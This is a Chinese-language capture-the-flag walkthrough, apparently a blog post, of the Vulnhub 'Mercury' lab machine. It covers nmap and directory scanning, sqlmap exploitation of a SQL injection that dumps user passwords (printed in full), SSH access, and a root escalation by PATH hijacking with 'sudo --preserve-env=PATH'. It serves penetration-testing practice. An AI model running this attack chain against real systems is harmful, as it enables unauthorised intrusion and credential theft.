首页 > 其他分享 >Vulnhub Mercury

Vulnhub Mercury

时间:2024-12-06 20:11:16浏览次数:5  
标签:Mercury 8080 10.129 -- nmap Vulnhub PATH 10.10

0x01:端口扫描

nmap -sn 10.10.10.0/24

image-20241206172300152

全端口扫描

nmap --min-rate 10000 -p- 10.10.10.129

image-20241206172416943

UDP扫描

nmap -sU --top=20 10.10.10.129

image-20241206172535600

详细端口扫描

nmap -sT -sC -sV -O --min-rate 10000 -p22,8080 10.10.10.129

image-20241206172839642

漏洞扫描

nmap --script=vuln -p22,8080 10.10.10.129

0x02:web渗透

image-20241206173054950

先扫目录

dirsearch -u http://10.10.10.129:8080
gobuster dir -u http://10.10.10.129:8080 -x php,zip,rar,txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

image-20241206173528165

image-20241206195713744

先查看/robots.txt

image-20241206173815538

没扫到啥有用的东西呢,我们在手动尝试一些其他的目录呢

image-20241206174038119

报错给了我们一个特别的目录/mercuryfacts,我们查看

image-20241206174212075

逐一搜索查看,See list有提示数据库为mysql

image-20241206174340893

Load a fact发现sql注入报错

image-20241206174423596

sqlmap -u "http://10.10.10.129:8080/mercuryfacts/1*/" --dbs

image-20241206174926585

sqlmap -u "http://10.10.10.129:8080/mercuryfacts/1*/" -D mercury -T users --dump

image-20241206175019733

拿到凭证

john@johnny1987
laura@lovemykids111
sam@lovemybeer111
webmaster@mercuryisthesizeof0.056Earths

尝试登录,最后成功以webmaster用户成功登录ssh

image-20241206175502406

0x03:权限提升

查看权限

sudo -l

image-20241206180700296

找到notes.txt,告诉了我们linuxmaster的密码,是base64

image-20241206180811731

image-20241206180950587

linuxmaster@mercurymeandiameteris4880km

成功横向移动

image-20241206181120186

查看权限

image-20241206181150493

image-20241206181213048

image-20241206193855047

可惜他没有写权限

我们可以通过劫持环境变量,将tail替换成vim,从而实现提权

我们先创建软链接

ln -s /usr/bin/vim tail

然后设置当前环境变量

export PATH=$(pwd):$PATH

image-20241206194823027

最后执行

sudo --preserve-env=PATH /usr/bin/check_syslog.sh

--preserve-env=PATH:用于控制在执行命令时是否保留当前用户的环境变量,因为 sudo 命令会使用安全的默认 的PATH路径,所以我们要加上它

image-20241206195157981

image-20241206195227339

0x04:思考总结

1.靶机Django没关debug导致输入不存在目录出现隐藏目录

2.这台靶机也可以使用Pwnkit脚本提权

标签:Mercury,8080,10.129,--,nmap,Vulnhub,PATH,10.10
From: https://www.cnblogs.com/kelec0ka/p/18591370

相关文章

  • Vulnhub Prime1
    0x01:端口扫描主机发现nmap-sn192.168.231.0/24全端口扫描UDP扫描没有结果详细端口扫描漏洞扫描看来是一个wordpress的cms0x02:web渗透扫目录先看secret.txt需要我们多做一些模糊测试我们看到其他目录那我们现在开始做模糊测试ffuf-uhttp://10.10.10.148......
  • Vulnhub Connect-The-Dots
    0x01:端口扫描主机发现nmap-sn192.168.231.0/24全端口扫描nmap--min-rate10000-p-192.168.231.144开放21ftp,80http,111rpcbind,2049nfsrpcbind主要的作用是将网络上的RPC服务与其对应的端口进行关联。它充当了客户端和服务器之间的桥梁,使得客户端可以通过服务的......
  • Vulnhub narak
    0x01:端口扫描主机发现nmap-sn192.168.231.0/24全端口扫描nmap--min-rate10000-p-192.168.231.14322ssh,80httpUDP扫描nmap-sU--top=20192.168.231.143有两个端口开放详细端口扫描nmap-sT-sC-sV-O--min-rate10000-p22,80192.168.231.143漏洞扫......
  • Vulnhub:DC-2
    靶机地址:VulnerableByDesign-Search:DC-2~VulnHub信息收集: arp-scan主机探活确定目标主机ip192.168.6.25nmap扫描目标主机开放端口nmap-p--sS-Pn-sV192.168.6.25访问192.168.6.25失败重定向到dc-2添加本地hosts解析mousepa......
  • Vulnhub:DC-1
    靶机地址:DC:1~VulnHub打靶过程信息收集主机探活arp-scan-l确定目标主机ip192.168.6.24nmap扫描目标主机开放端口nmap-sS-sV-p--Pn192.168.6.24访问192.168.6.24登录页面识别CMSdrupal7也可利用whatweb识别网站指纹信息whatwe......
  • vulnhub:Empire: Breakout
    靶机地址Empire:Breakout~VulnHub打靶过程信息收集:目标ip:192.168.6.10在目标ip未知的情况下可用arp-scan命令发现主机arp-scan-l扫描目标开放端口nmap-sS-Pn-sV192.168.6.10扫描得到开放端口和服务端口号状态服务名称版本信息说明......
  • Vulnhub sick0s1.1
    0x01:端口扫描主机发现nmap-sn192.168.231.0/24全端口扫描nmap--min-rate10000-p-192.168.231.14122ssh,3128squid-http,但8080http是关闭的Squid是一个高性能的开源代理服务器软件,它支持多种协议,包括HTTP、HTTPS、FTP等。它通常用于以下几种用途:1、Web代理:作为......
  • Vulnhub-Earth靶机笔记
    Earth靶机笔记概述这是一台Vulnhub的靶机,主要是Earth靶机地址:https://vulnhub.com/entry/the-planets-earth,755/#download一、nmap扫描1、端口扫描-sT以TCP全连接扫描,--min-rate10000以最低10000速率进行扫描,-p-进行全端口扫描,-oports结果输出到ports文件......
  • Vulnhub WestWild1.1
    0x01:端口扫描主机发现nmap-sn192.168.231.0/24全端口扫描nmap--min-rate10000-p-192.168.231.140开了22ssh,80http,两个smb服务详细端口扫描nmap-sT-sC-sV-O--min-rate10000-p22,80,139,445192.168.231.140漏洞扫描nmap--script=vuln-p22,80,139,445......
  • Vulnhub Kioptrix4
    VulnhubKioptrix40x01:端口扫描主机发现nmap-sn192.168.231.0/24全端口扫描nmap--min-rate10000-p-192.168.231.139开放22ssh,80http,139netbios-ssn,445microsoft-ds,后两个是smb服务端口139(NetBIOS-SSN):用于通过NetBIOS协议在局域网内实现文件和打印机共享。虽然......